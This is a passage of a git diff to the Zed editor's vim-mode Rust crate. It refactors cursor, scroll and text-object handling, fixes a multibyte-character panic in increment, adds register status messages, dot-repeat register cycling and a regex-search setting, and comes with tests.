{r" + ˇ#if + #if + + #else + + #endif + + #else + #endif + "}); + cx.simulate_shared_keystrokes("j % % %").await; + cx.shared_state().await.assert_eq(indoc! {r" + #if + ˇ#if + + #else + + #endif + + #else + #endif + "}); + } + #[gpui::test] async fn test_unmatched_forward(cx: &mut gpui::TestAppContext) { let mut cx = NeovimBackedTestContext::new(cx).await; diff --git a/crates/vim/src/normal.rs b/crates/vim/src/normal.rs index 1501d29c7b9b712f3f8edc25025545d0fa0baa08..b54a0262744afddbefbd3d4ce5a737dfe3ee7502 100644 --- a/crates/vim/src/normal.rs +++ b/crates/vim/src/normal.rs @@ -731,10 +731,10 @@ impl Vim { .collect::>(); editor.edit_with_autoindent(edits, cx); editor.change_selections(Default::default(), window, cx, |s| { - s.move_cursors_with(&mut |map, cursor, _| { - let previous_line = map.start_of_relative_buffer_row(cursor, -1); + s.move_with(&mut |map, selection| { + let previous_line = map.start_of_relative_buffer_row(selection.start, -1); let insert_point = motion::end_of_line(map, false, previous_line, 1); - (insert_point, SelectionGoal::None) + selection.collapse_to(insert_point, SelectionGoal::None) }); }); }); @@ -750,14 +750,19 @@ impl Vim { self.start_recording(cx); self.switch_mode(Mode::Insert, false, window, cx); self.update_editor(cx, |_, editor, cx| { - let text_layout_details = editor.text_layout_details(window, cx); editor.transact(window, cx, |editor, window, cx| { let selections = editor.selections.all::(&editor.display_snapshot(cx)); let snapshot = editor.buffer().read(cx).snapshot(cx); let selection_end_rows: BTreeSet = selections .into_iter() - .map(|selection| selection.end.row) + .map(|selection| { + if !selection.is_empty() && selection.end.column == 0 { + selection.end.row.saturating_sub(1) + } else { + selection.end.row + } + }) .collect(); let edits = selection_end_rows .into_iter() @@ -772,14 +777,17 @@ impl Vim { }) .collect::>(); editor.change_selections(Default::default(), window, cx, |s| { - s.maybe_move_cursors_with(&mut |map, 
cursor, goal| { - Motion::CurrentLine.move_point( - map, - cursor, - goal, - None, - &text_layout_details, - ) + s.move_with(&mut |map, selection| { + let current_line = if !selection.is_empty() && selection.end.column() == 0 { + // If this is an insert after a selection to the end of the line, the + // cursor needs to be bumped back, because it'll be at the start of the + // *next* line. + map.start_of_relative_buffer_row(selection.end, -1) + } else { + selection.end + }; + let insert_point = motion::end_of_line(map, false, current_line, 1); + selection.collapse_to(insert_point, SelectionGoal::None) }); }); editor.edit_with_autoindent(edits, cx); @@ -924,7 +932,7 @@ impl Vim { Vim::take_forced_motion(cx); self.update_editor(cx, |vim, editor, cx| { let selection = editor.selections.newest_anchor(); - let Some((buffer, point, _)) = editor + let Some((buffer, point)) = editor .buffer() .read(cx) .point_to_buffer_point(selection.head(), cx) @@ -949,17 +957,16 @@ impl Vim { let current_line = point.row; let percentage = current_line as f32 / lines as f32; let modified = if buffer.is_dirty() { " [modified]" } else { "" }; - vim.status_label = Some( + vim.set_status_label( format!( "{}{} {} lines --{:.0}%--", filename, modified, lines, percentage * 100.0, - ) - .into(), + ), + cx, ); - cx.notify(); }); } diff --git a/crates/vim/src/normal/increment.rs b/crates/vim/src/normal/increment.rs index 9b6707fdb92520e95e874a5be143024beb21b873..9df8721301a82ed26618f7181ba80c43cbc702df 100644 --- a/crates/vim/src/normal/increment.rs +++ b/crates/vim/src/normal/increment.rs @@ -203,20 +203,25 @@ fn find_target( let start_offset = start.to_offset(snapshot); let end_offset = end.to_offset(snapshot); - let mut offset = start_offset; let mut first_char_is_num = snapshot - .chars_at(offset) + .chars_at(start_offset) .next() .map_or(false, |ch| ch.is_ascii_hexdigit()); let mut pre_char = String::new(); - let next_offset = offset + let next_offset = start_offset + snapshot 
.chars_at(start_offset) .next() .map_or(0, |ch| ch.len_utf8()); - // Backward scan to find the start of the number, but stop at start_offset + // Backward scan to find the start of the number, but stop at start_offset. + // We track `offset` as the start position of the current character. Initialize + // to `next_offset` and decrement at the start of each iteration so that `offset` + // always lands on a valid character boundary (not in the middle of a multibyte char). + let mut offset = next_offset; for ch in snapshot.reversed_chars_at(next_offset) { + offset -= ch.len_utf8(); + // Search boundaries if offset.0 == 0 || ch.is_whitespace() || (need_range && offset <= start_offset) { break; @@ -238,7 +243,6 @@ fn find_target( } pre_char.insert(0, ch); - offset -= ch.len_utf8(); } // The backward scan breaks on whitespace, including newlines. Without this @@ -895,4 +899,15 @@ mod test { .await .assert_eq("# Title\n2. item\nˇ2. item\n3. item"); } + + #[gpui::test] + async fn test_increment_with_multibyte_characters(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + + // Test cursor after a multibyte character - this would panic before the fix + // because the backward scan would land in the middle of the Korean character + cx.set_state("지ˇ1", Mode::Normal); + cx.simulate_keystrokes("ctrl-a"); + cx.assert_state("지ˇ2", Mode::Normal); + } } diff --git a/crates/vim/src/normal/paste.rs b/crates/vim/src/normal/paste.rs index ec964ec9ae3af08b108aa027a0aa62883dbcbcc5..fab9b353e3e9bb5b5d00d9d415783b4a5a31ae95 100644 --- a/crates/vim/src/normal/paste.rs +++ b/crates/vim/src/normal/paste.rs @@ -50,6 +50,10 @@ impl Vim { }) .filter(|reg| !reg.text.is_empty()) else { + vim.set_status_label( + format!("Nothing in register {}", selected_register.unwrap_or('"')), + cx, + ); return; }; let clipboard_selections = clipboard_selections @@ -249,7 +253,7 @@ impl Vim { ) { self.stop_recording(cx); let selected_register = self.selected_register.take(); - 
self.update_editor(cx, |_, editor, cx| { + self.update_editor(cx, |vim, editor, cx| { editor.transact(window, cx, |editor, window, cx| { editor.set_clip_at_line_ends(false, cx); editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { @@ -262,6 +266,10 @@ impl Vim { globals.read_register(selected_register, Some(editor), cx) }) .filter(|reg| !reg.text.is_empty()) else { + vim.set_status_label( + format!("Nothing in register {}", selected_register.unwrap_or('"')), + cx, + ); return; }; editor.insert(&text, window, cx); @@ -286,7 +294,7 @@ impl Vim { ) { self.stop_recording(cx); let selected_register = self.selected_register.take(); - self.update_editor(cx, |_, editor, cx| { + self.update_editor(cx, |vim, editor, cx| { let text_layout_details = editor.text_layout_details(window, cx); editor.transact(window, cx, |editor, window, cx| { editor.set_clip_at_line_ends(false, cx); @@ -306,6 +314,10 @@ impl Vim { globals.read_register(selected_register, Some(editor), cx) }) .filter(|reg| !reg.text.is_empty()) else { + vim.set_status_label( + format!("Nothing in register {}", selected_register.unwrap_or('"')), + cx, + ); return; }; editor.insert(&text, window, cx); diff --git a/crates/vim/src/normal/repeat.rs b/crates/vim/src/normal/repeat.rs index 8a4bfc241d1b0c62b17464bfb1dd5076015ac638..387bca0912be303fbe86bf947446fe85a50d6022 100644 --- a/crates/vim/src/normal/repeat.rs +++ b/crates/vim/src/normal/repeat.rs @@ -291,6 +291,24 @@ impl Vim { }) else { return; }; + + // Dot repeat always uses the recorded register, ignoring any "X + // override, as the register is an inherent part of the recorded action. + // For numbered registers, Neovim increments on each dot repeat so after + // using `"1p`, using `.` will equate to `"2p", the next `.` to `"3p`, + // etc.. 
+ let recorded_register = cx.global::().recorded_register_for_dot; + let next_register = recorded_register + .filter(|c| matches!(c, '1'..='9')) + .map(|c| ((c as u8 + 1).min(b'9')) as char); + + self.selected_register = next_register.or(recorded_register); + if let Some(next_register) = next_register { + Vim::update_globals(cx, |globals, _| { + globals.recorded_register_for_dot = Some(next_register) + }) + }; + if mode != Some(self.mode) { if let Some(mode) = mode { self.switch_mode(mode, false, window, cx) @@ -441,6 +459,207 @@ mod test { cx.shared_state().await.assert_eq("THE QUICK ˇbrown fox"); } + #[gpui::test] + async fn test_dot_repeat_registers_paste(cx: &mut gpui::TestAppContext) { + let mut cx = NeovimBackedTestContext::new(cx).await; + + // basic paste repeat uses the unnamed register + cx.set_shared_state("ˇhello\n").await; + cx.simulate_shared_keystrokes("y y p").await; + cx.shared_state().await.assert_eq("hello\nˇhello\n"); + cx.simulate_shared_keystrokes(".").await; + cx.shared_state().await.assert_eq("hello\nhello\nˇhello\n"); + + // "_ (blackhole) is recorded and replayed, so the pasted text is still + // the original yanked line. + cx.set_shared_state(indoc! {" + ˇone + two + three + four + "}) + .await; + cx.simulate_shared_keystrokes("y y j \" _ d d . p").await; + cx.shared_state().await.assert_eq(indoc! {" + one + four + ˇone + "}); + + // the recorded register is replayed, not whatever is in the unnamed register + cx.set_shared_state(indoc! {" + ˇone + two + "}) + .await; + cx.simulate_shared_keystrokes("y y j \" a y y \" a p .") + .await; + cx.shared_state().await.assert_eq(indoc! {" + one + two + two + ˇtwo + "}); + + // `"X.` ignores the override and always uses the recorded register. + // Both `dd` calls go into register `a`, so register `b` is empty and + // `"bp` pastes nothing. + cx.set_shared_state(indoc! 
{" + ˇone + two + three + "}) + .await; + cx.simulate_shared_keystrokes("\" a d d \" b .").await; + cx.shared_state().await.assert_eq(indoc! {" + ˇthree + "}); + cx.simulate_shared_keystrokes("\" a p \" b p").await; + cx.shared_state().await.assert_eq(indoc! {" + three + ˇtwo + "}); + + // numbered registers cycle on each dot repeat: "1p . . uses registers 2, 3, … + // Since the cycling behavior caps at register 9, the first line to be + // deleted `1`, is no longer in any of the registers. + cx.set_shared_state(indoc! {" + ˇone + two + three + four + five + six + seven + eight + nine + ten + "}) + .await; + cx.simulate_shared_keystrokes("d d . . . . . . . . .").await; + cx.shared_state().await.assert_eq(indoc! {"ˇ"}); + cx.simulate_shared_keystrokes("\" 1 p . . . . . . . . .") + .await; + cx.shared_state().await.assert_eq(indoc! {" + + ten + nine + eight + seven + six + five + four + three + two + ˇtwo"}); + + // unnamed register repeat: dd records None, so . pastes the same + // deleted text + cx.set_shared_state(indoc! {" + ˇone + two + three + "}) + .await; + cx.simulate_shared_keystrokes("d d p .").await; + cx.shared_state().await.assert_eq(indoc! {" + two + one + ˇone + three + "}); + + // After `"1p` cycles to `2`, using `"ap` resets recorded_register to `a`, + // so the next `.` uses `a` and not 3. + cx.set_shared_state(indoc! {" + one + two + ˇthree + "}) + .await; + cx.simulate_shared_keystrokes("\" 2 y y k k \" a y y j \" 1 y y k \" 1 p . \" a p .") + .await; + cx.shared_state().await.assert_eq(indoc! {" + one + two + three + one + ˇone + two + three + "}); + } + + // This needs to be a separate test from `test_dot_repeat_registers_paste` + // as Neovim doesn't have support for using registers in replace operations + // by default. + #[gpui::test] + async fn test_dot_repeat_registers_replace(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + + cx.set_state( + indoc! 
{" + line ˇone + line two + line three + "}, + Mode::Normal, + ); + + // 1. Yank `one` into register `a` + // 2. Move down and yank `two` into the default register + // 3. Replace `two` with the contents of register `a` + cx.simulate_keystrokes("\" a y w j y w \" a g R w"); + cx.assert_state( + indoc! {" + line one + line onˇe + line three + "}, + Mode::Normal, + ); + + // 1. Move down to `three` + // 2. Repeat the replace operation + cx.simulate_keystrokes("j ."); + cx.assert_state( + indoc! {" + line one + line one + line onˇe + "}, + Mode::Normal, + ); + + // Similar test, but this time using numbered registers, as those should + // automatically increase on successive uses of `.` . + cx.set_state( + indoc! {" + line ˇone + line two + line three + line four + "}, + Mode::Normal, + ); + + // 1. Yank `one` into register `1` + // 2. Yank `two` into register `2` + // 3. Move down and yank `three` into the default register + // 4. Replace `three` with the contents of register `1` + // 5. Move down and repeat + cx.simulate_keystrokes("\" 1 y w j \" 2 y w j y w \" 1 g R w j ."); + cx.assert_state( + indoc! 
{" + line one + line two + line one + line twˇo + "}, + Mode::Normal, + ); + } + #[gpui::test] async fn test_repeat_ime(cx: &mut gpui::TestAppContext) { let mut cx = VimTestContext::new(cx, true).await; diff --git a/crates/vim/src/normal/scroll.rs b/crates/vim/src/normal/scroll.rs index 9d61aea9525b939271631feb6d493df2871a9607..01719cd59325f35474f10775488fd2aea4f38e41 100644 --- a/crates/vim/src/normal/scroll.rs +++ b/crates/vim/src/normal/scroll.rs @@ -88,82 +88,74 @@ pub fn register(editor: &mut Editor, cx: &mut Context) { impl Vim { fn scroll( &mut self, - move_cursor: bool, + preserve_cursor_position: bool, window: &mut Window, cx: &mut Context, by: fn(c: Option) -> ScrollAmount, ) { let amount = by(Vim::take_count(cx).map(|c| c as f32)); - let mode = self.mode; Vim::take_forced_motion(cx); self.exit_temporary_normal(window, cx); - self.update_editor(cx, |_, editor, cx| { - scroll_editor(editor, mode, move_cursor, amount, window, cx) - }); + self.scroll_editor(preserve_cursor_position, amount, window, cx); } -} -fn scroll_editor( - editor: &mut Editor, - mode: Mode, - preserve_cursor_position: bool, - amount: ScrollAmount, - window: &mut Window, - cx: &mut Context, -) { - let should_move_cursor = editor.newest_selection_on_screen(cx).is_eq(); - let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); - let old_top = editor - .scroll_manager - .scroll_top_display_point(&display_snapshot, cx); - - if editor.scroll_hover(amount, window, cx) { - return; - } + fn scroll_editor( + &mut self, + preserve_cursor_position: bool, + amount: ScrollAmount, + window: &mut Window, + cx: &mut Context, + ) { + self.update_editor(cx, |vim, editor, cx| { + let should_move_cursor = editor.newest_selection_on_screen(cx).is_eq(); + let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); + let old_top = editor + .scroll_manager + .scroll_top_display_point(&display_snapshot, cx); + + if editor.scroll_hover(amount, window, cx) { + 
return; + } - let full_page_up = amount.is_full_page() && amount.direction().is_upwards(); - let amount = match (amount.is_full_page(), editor.visible_line_count()) { - (true, Some(visible_line_count)) => { - if amount.direction().is_upwards() { - ScrollAmount::Line((amount.lines(visible_line_count) + 1.0) as f32) - } else { - ScrollAmount::Line((amount.lines(visible_line_count) - 1.0) as f32) + let full_page_up = amount.is_full_page() && amount.direction().is_upwards(); + let amount = match (amount.is_full_page(), editor.visible_line_count()) { + (true, Some(visible_line_count)) => { + if amount.direction().is_upwards() { + ScrollAmount::Line((amount.lines(visible_line_count) + 1.0) as f32) + } else { + ScrollAmount::Line((amount.lines(visible_line_count) - 1.0) as f32) + } + } + _ => amount, + }; + + editor.scroll_screen(&amount, window, cx); + if !should_move_cursor { + return; } - } - _ => amount, - }; - editor.scroll_screen(&amount, window, cx); - if !should_move_cursor { - return; - } + let Some(visible_line_count) = editor.visible_line_count() else { + return; + }; - let Some(visible_line_count) = editor.visible_line_count() else { - return; - }; + let Some(visible_column_count) = editor.visible_column_count() else { + return; + }; - let Some(visible_column_count) = editor.visible_column_count() else { - return; - }; + let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); + let top = editor + .scroll_manager + .scroll_top_display_point(&display_snapshot, cx); + let vertical_scroll_margin = EditorSettings::get_global(cx).vertical_scroll_margin; - let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); - let top = editor - .scroll_manager - .scroll_top_display_point(&display_snapshot, cx); - let vertical_scroll_margin = EditorSettings::get_global(cx).vertical_scroll_margin; - - editor.change_selections( - SelectionEffects::no_scroll().nav_history(false), - window, - cx, - |s| { - s.move_with(&mut |map, 
selection| { + let mut move_cursor = |map: &editor::display_map::DisplaySnapshot, + mut head: DisplayPoint, + goal: SelectionGoal| { // TODO: Improve the logic and function calls below to be dependent on // the `amount`. If the amount is vertical, we don't care about // columns, while if it's horizontal, we don't care about rows, // so we don't need to calculate both and deal with logic for // both. - let mut head = selection.head(); let max_point = map.max_point(); let starting_column = head.column(); @@ -171,17 +163,18 @@ fn scroll_editor( (vertical_scroll_margin as u32).min(visible_line_count as u32 / 2); if preserve_cursor_position { - let new_row = if old_top.row() == top.row() { - DisplayRow( - head.row() - .0 - .saturating_add_signed(amount.lines(visible_line_count) as i32), - ) - } else { - DisplayRow(top.row().0.saturating_add_signed( - selection.head().row().0 as i32 - old_top.row().0 as i32, - )) - }; + let new_row = + if old_top.row() == top.row() { + DisplayRow( + head.row() + .0 + .saturating_add_signed(amount.lines(visible_line_count) as i32), + ) + } else { + DisplayRow(top.row().0.saturating_add_signed( + head.row().0 as i32 - old_top.row().0 as i32, + )) + }; head = map.clip_point(DisplayPoint::new(new_row, head.column()), Bias::Left) } @@ -259,17 +252,36 @@ fn scroll_editor( let new_head = map.clip_point(DisplayPoint::new(new_row, new_column), Bias::Left); let goal = match amount { ScrollAmount::Column(_) | ScrollAmount::PageWidth(_) => SelectionGoal::None, - _ => selection.goal, + _ => goal, }; - if selection.is_empty() || !mode.is_visual() { - selection.collapse_to(new_head, goal) - } else { - selection.set_head(new_head, goal) - }; - }) - }, - ); + Some((new_head, goal)) + }; + + if vim.mode == Mode::VisualBlock { + vim.visual_block_motion(true, editor, window, cx, &mut move_cursor); + } else { + editor.change_selections( + SelectionEffects::no_scroll().nav_history(false), + window, + cx, + |s| { + s.move_with(&mut |map, selection| { + if let 
Some((new_head, goal)) = + move_cursor(map, selection.head(), selection.goal) + { + if selection.is_empty() || !vim.mode.is_visual() { + selection.collapse_to(new_head, goal) + } else { + selection.set_head(new_head, goal) + } + } + }) + }, + ); + } + }); + } } #[cfg(test)] diff --git a/crates/vim/src/normal/search.rs b/crates/vim/src/normal/search.rs index 248f43c08192182cb266dbfc43a5a769f87429cd..22c453c877ec89fdbf432d19d89167285b78b12f 100644 --- a/crates/vim/src/normal/search.rs +++ b/crates/vim/src/normal/search.rs @@ -245,7 +245,7 @@ impl Vim { search_bar.set_replacement(None, cx); let mut options = SearchOptions::NONE; - if action.regex { + if action.regex && VimSettings::get_global(cx).use_regex_search { options |= SearchOptions::REGEX; } if action.backwards { @@ -284,6 +284,7 @@ impl Vim { self.search = SearchState { direction, count, + cmd_f_search: false, prior_selections, prior_operator: self.operator_stack.last().cloned(), prior_mode, @@ -298,6 +299,7 @@ impl Vim { let current_mode = self.mode; self.search = Default::default(); self.search.prior_mode = current_mode; + self.search.cmd_f_search = true; cx.propagate(); } @@ -957,6 +959,45 @@ mod test { cx.assert_editor_state("«oneˇ» one one one"); } + #[gpui::test] + async fn test_non_vim_search_in_vim_mode(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.cx.set_state("ˇone one one one"); + cx.run_until_parked(); + cx.simulate_keystrokes("cmd-f"); + cx.run_until_parked(); + + cx.assert_state("«oneˇ» one one one", Mode::Visual); + cx.simulate_keystrokes("enter"); + cx.run_until_parked(); + cx.assert_state("one «oneˇ» one one", Mode::Visual); + cx.simulate_keystrokes("shift-enter"); + cx.run_until_parked(); + cx.assert_state("«oneˇ» one one one", Mode::Visual); + + cx.simulate_keystrokes("escape"); + cx.run_until_parked(); + cx.assert_state("«oneˇ» one one one", Mode::Visual); + } + + #[gpui::test] + async fn test_non_vim_search_in_vim_insert_mode(cx: &mut 
gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.set_state("ˇone one one one", Mode::Insert); + cx.run_until_parked(); + cx.simulate_keystrokes("cmd-f"); + cx.run_until_parked(); + + cx.assert_state("«oneˇ» one one one", Mode::Insert); + cx.simulate_keystrokes("enter"); + cx.run_until_parked(); + cx.assert_state("one «oneˇ» one one", Mode::Insert); + + cx.simulate_keystrokes("escape"); + cx.run_until_parked(); + cx.assert_state("one «oneˇ» one one", Mode::Insert); + } + #[gpui::test] async fn test_visual_star_hash(cx: &mut gpui::TestAppContext) { let mut cx = NeovimBackedTestContext::new(cx).await; @@ -1405,4 +1446,66 @@ mod test { // The cursor should be at the match location on line 3 (row 2). cx.assert_state("hello world\nfoo bar\nhello ˇagain\n", Mode::Normal); } + + #[gpui::test] + async fn test_vim_search_respects_search_settings(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + + cx.update_global(|store: &mut SettingsStore, cx| { + store.update_user_settings(cx, |settings| { + settings.vim.get_or_insert_default().use_regex_search = Some(false); + }); + }); + + cx.set_state("ˇcontent", Mode::Normal); + cx.simulate_keystrokes("/"); + cx.run_until_parked(); + + // Verify search options are set from settings + let search_bar = cx.workspace(|workspace, _, cx| { + workspace + .active_pane() + .read(cx) + .toolbar() + .read(cx) + .item_of_type::() + .expect("Buffer search bar should be active") + }); + + cx.update_entity(search_bar, |bar, _window, _cx| { + assert!( + !bar.has_search_option(search::SearchOptions::REGEX), + "Vim search open without regex mode" + ); + }); + + cx.simulate_keystrokes("escape"); + cx.run_until_parked(); + + cx.update_global(|store: &mut SettingsStore, cx| { + store.update_user_settings(cx, |settings| { + settings.vim.get_or_insert_default().use_regex_search = Some(true); + }); + }); + + cx.simulate_keystrokes("/"); + cx.run_until_parked(); + + let search_bar = 
cx.workspace(|workspace, _, cx| { + workspace + .active_pane() + .read(cx) + .toolbar() + .read(cx) + .item_of_type::() + .expect("Buffer search bar should be active") + }); + + cx.update_entity(search_bar, |bar, _window, _cx| { + assert!( + bar.has_search_option(search::SearchOptions::REGEX), + "Vim search opens with regex mode" + ); + }); + } } diff --git a/crates/vim/src/object.rs b/crates/vim/src/object.rs index 1c96ba74b455c5d94e53a0ab9c78cd3ae8af5b3c..67b4b16b178e75316eb10b051ab9153737777e3f 100644 --- a/crates/vim/src/object.rs +++ b/crates/vim/src/object.rs @@ -203,33 +203,24 @@ fn find_mini_delimiters( is_valid_delimiter: &DelimiterPredicate, ) -> Option> { let point = map.clip_at_line_end(display_point).to_point(map); - let offset = point.to_offset(&map.buffer_snapshot()); + let offset = map.buffer_snapshot().point_to_offset(point); let line_range = get_line_range(map, point); let visible_line_range = get_visible_line_range(&line_range); let snapshot = &map.buffer_snapshot(); - let mut excerpt = snapshot.excerpt_containing(offset..offset)?; - let buffer = excerpt.buffer(); - let buffer_offset = excerpt.map_offset_to_buffer(offset); - let bracket_filter = |open: Range, close: Range| { - is_valid_delimiter(buffer, open.start, close.start) - }; - - // Try to find delimiters in visible range first let ranges = map .buffer_snapshot() .bracket_ranges(visible_line_range) .map(|ranges| { ranges.filter_map(|(open, close)| { - // Convert the ranges from multibuffer space to buffer space as - // that is what `is_valid_delimiter` expects, otherwise it might - // panic as the values might be out of bounds. 
- let buffer_open = excerpt.map_range_to_buffer(open.clone()); - let buffer_close = excerpt.map_range_to_buffer(close.clone()); + let (buffer, buffer_open) = + snapshot.range_to_buffer_range::(open.clone())?; + let (_, buffer_close) = + snapshot.range_to_buffer_range::(close.clone())?; - if is_valid_delimiter(buffer, buffer_open.start.0, buffer_close.start.0) { + if is_valid_delimiter(buffer, buffer_open.start, buffer_close.start) { Some((open, close)) } else { None @@ -247,18 +238,31 @@ fn find_mini_delimiters( ); } - // Fall back to innermost enclosing brackets - let (open_bracket, close_bracket) = buffer - .innermost_enclosing_bracket_ranges(buffer_offset..buffer_offset, Some(&bracket_filter))?; + let results = snapshot.map_excerpt_ranges(offset..offset, |buffer, _, input_range| { + let buffer_offset = input_range.start.0; + let bracket_filter = |open: Range, close: Range| { + is_valid_delimiter(buffer, open.start, close.start) + }; + let Some((open, close)) = buffer.innermost_enclosing_bracket_ranges( + buffer_offset..buffer_offset, + Some(&bracket_filter), + ) else { + return vec![]; + }; + vec![ + (BufferOffset(open.start)..BufferOffset(open.end), ()), + (BufferOffset(close.start)..BufferOffset(close.end), ()), + ] + })?; + + if results.len() < 2 { + return None; + } Some( DelimiterRange { - open: excerpt.map_range_from_buffer( - BufferOffset(open_bracket.start)..BufferOffset(open_bracket.end), - ), - close: excerpt.map_range_from_buffer( - BufferOffset(close_bracket.start)..BufferOffset(close_bracket.end), - ), + open: results[0].0.clone(), + close: results[1].0.clone(), } .to_display_range(map, around), ) @@ -935,61 +939,64 @@ pub fn surrounding_html_tag( } let snapshot = &map.buffer_snapshot(); - let offset = head.to_offset(map, Bias::Left); - let mut excerpt = snapshot.excerpt_containing(offset..offset)?; - let buffer = excerpt.buffer(); - let offset = excerpt.map_offset_to_buffer(offset); - - // Find the most closest to current offset - let mut cursor = 
buffer.syntax_layer_at(offset)?.node().walk(); - let mut last_child_node = cursor.node(); - while cursor.goto_first_child_for_byte(offset.0).is_some() { - last_child_node = cursor.node(); - } - - let mut last_child_node = Some(last_child_node); - while let Some(cur_node) = last_child_node { - if cur_node.child_count() >= 2 { - let first_child = cur_node.child(0); - let last_child = cur_node.child(cur_node.child_count() as u32 - 1); - if let (Some(first_child), Some(last_child)) = (first_child, last_child) { - let open_tag = open_tag(buffer.chars_for_range(first_child.byte_range())); - let close_tag = close_tag(buffer.chars_for_range(last_child.byte_range())); - // It needs to be handled differently according to the selection length - let is_valid = if range.end.to_offset(map, Bias::Left) - - range.start.to_offset(map, Bias::Left) - <= 1 - { - offset.0 <= last_child.end_byte() - } else { - excerpt - .map_offset_to_buffer(range.start.to_offset(map, Bias::Left)) - .0 - >= first_child.start_byte() - && excerpt - .map_offset_to_buffer(range.end.to_offset(map, Bias::Left)) - .0 - <= last_child.start_byte() + 1 - }; - if open_tag.is_some() && open_tag == close_tag && is_valid { - let range = if around { - first_child.byte_range().start..last_child.byte_range().end - } else { - first_child.byte_range().end..last_child.byte_range().start - }; - let range = BufferOffset(range.start)..BufferOffset(range.end); - if excerpt.contains_buffer_range(range.clone()) { - let result = excerpt.map_range_from_buffer(range); - return Some( - result.start.to_display_point(map)..result.end.to_display_point(map), - ); + let head_offset = head.to_offset(map, Bias::Left); + let range_start = range.start.to_offset(map, Bias::Left); + let range_end = range.end.to_offset(map, Bias::Left); + let head_is_start = head_offset <= range_start; + + let results = snapshot.map_excerpt_ranges( + range_start..range_end, + |buffer, _excerpt_range, input_buffer_range| { + let buffer_offset = if head_is_start 
{ + input_buffer_range.start + } else { + input_buffer_range.end + }; + + let Some(layer) = buffer.syntax_layer_at(buffer_offset) else { + return Vec::new(); + }; + let mut cursor = layer.node().walk(); + let mut last_child_node = cursor.node(); + while cursor.goto_first_child_for_byte(buffer_offset.0).is_some() { + last_child_node = cursor.node(); + } + + let mut last_child_node = Some(last_child_node); + while let Some(cur_node) = last_child_node { + if cur_node.child_count() >= 2 { + let first_child = cur_node.child(0); + let last_child = cur_node.child(cur_node.child_count() as u32 - 1); + if let (Some(first_child), Some(last_child)) = (first_child, last_child) { + let open_tag = open_tag(buffer.chars_for_range(first_child.byte_range())); + let close_tag = close_tag(buffer.chars_for_range(last_child.byte_range())); + let is_valid = if range_end.saturating_sub(range_start) <= 1 { + buffer_offset.0 <= last_child.end_byte() + } else { + input_buffer_range.start.0 >= first_child.start_byte() + && input_buffer_range.end.0 <= last_child.start_byte() + 1 + }; + if open_tag.is_some() && open_tag == close_tag && is_valid { + let buffer_range = if around { + first_child.byte_range().start..last_child.byte_range().end + } else { + first_child.byte_range().end..last_child.byte_range().start + }; + return vec![( + BufferOffset(buffer_range.start)..BufferOffset(buffer_range.end), + (), + )]; + } } } + last_child_node = cur_node.parent(); } - } - last_child_node = cur_node.parent(); - } - None + Vec::new() + }, + )?; + + let (result, ()) = results.into_iter().next()?; + Some(result.start.to_display_point(map)..result.end.to_display_point(map)) } /// Returns a range that surrounds the word and following whitespace @@ -1163,44 +1170,55 @@ fn text_object( let snapshot = &map.buffer_snapshot(); let offset = relative_to.to_offset(map, Bias::Left); - let mut excerpt = snapshot.excerpt_containing(offset..offset)?; - let buffer = excerpt.buffer(); - let offset = 
excerpt.map_offset_to_buffer(offset); - - let mut matches: Vec> = buffer - .text_object_ranges(offset..offset, TreeSitterOptions::default()) - .filter_map(|(r, m)| if m == target { Some(r) } else { None }) - .collect(); - matches.sort_by_key(|r| r.end - r.start); - if let Some(buffer_range) = matches.first() { - let buffer_range = BufferOffset(buffer_range.start)..BufferOffset(buffer_range.end); - let range = excerpt.map_range_from_buffer(buffer_range); - return Some(range.start.to_display_point(map)..range.end.to_display_point(map)); - } - - let around = target.around()?; - let mut matches: Vec> = buffer - .text_object_ranges(offset..offset, TreeSitterOptions::default()) - .filter_map(|(r, m)| if m == around { Some(r) } else { None }) - .collect(); - matches.sort_by_key(|r| r.end - r.start); - let around_range = matches.first()?; - - let mut matches: Vec> = buffer - .text_object_ranges(around_range.clone(), TreeSitterOptions::default()) - .filter_map(|(r, m)| if m == target { Some(r) } else { None }) - .collect(); - matches.sort_by_key(|r| r.start); - if let Some(buffer_range) = matches.first() - && !buffer_range.is_empty() - { - let buffer_range = BufferOffset(buffer_range.start)..BufferOffset(buffer_range.end); - let range = excerpt.map_range_from_buffer(buffer_range); - return Some(range.start.to_display_point(map)..range.end.to_display_point(map)); - } - let around_range = BufferOffset(around_range.start)..BufferOffset(around_range.end); - let buffer_range = excerpt.map_range_from_buffer(around_range); - return Some(buffer_range.start.to_display_point(map)..buffer_range.end.to_display_point(map)); + let results = + snapshot.map_excerpt_ranges(offset..offset, |buffer, _excerpt_range, buffer_range| { + let buffer_offset = buffer_range.start; + + let mut matches: Vec> = buffer + .text_object_ranges(buffer_offset..buffer_offset, TreeSitterOptions::default()) + .filter_map(|(r, m)| if m == target { Some(r) } else { None }) + .collect(); + matches.sort_by_key(|r| 
r.end - r.start); + if let Some(buffer_range) = matches.first() { + return vec![( + BufferOffset(buffer_range.start)..BufferOffset(buffer_range.end), + (), + )]; + } + + let Some(around) = target.around() else { + return vec![]; + }; + let mut matches: Vec> = buffer + .text_object_ranges(buffer_offset..buffer_offset, TreeSitterOptions::default()) + .filter_map(|(r, m)| if m == around { Some(r) } else { None }) + .collect(); + matches.sort_by_key(|r| r.end - r.start); + let Some(around_range) = matches.first() else { + return vec![]; + }; + + let mut matches: Vec> = buffer + .text_object_ranges(around_range.clone(), TreeSitterOptions::default()) + .filter_map(|(r, m)| if m == target { Some(r) } else { None }) + .collect(); + matches.sort_by_key(|r| r.start); + if let Some(buffer_range) = matches.first() + && !buffer_range.is_empty() + { + return vec![( + BufferOffset(buffer_range.start)..BufferOffset(buffer_range.end), + (), + )]; + } + vec![( + BufferOffset(around_range.start)..BufferOffset(around_range.end), + (), + )] + })?; + + let (range, ()) = results.into_iter().next()?; + Some(range.start.to_display_point(map)..range.end.to_display_point(map)) } fn argument( @@ -1211,16 +1229,11 @@ fn argument( let snapshot = &map.buffer_snapshot(); let offset 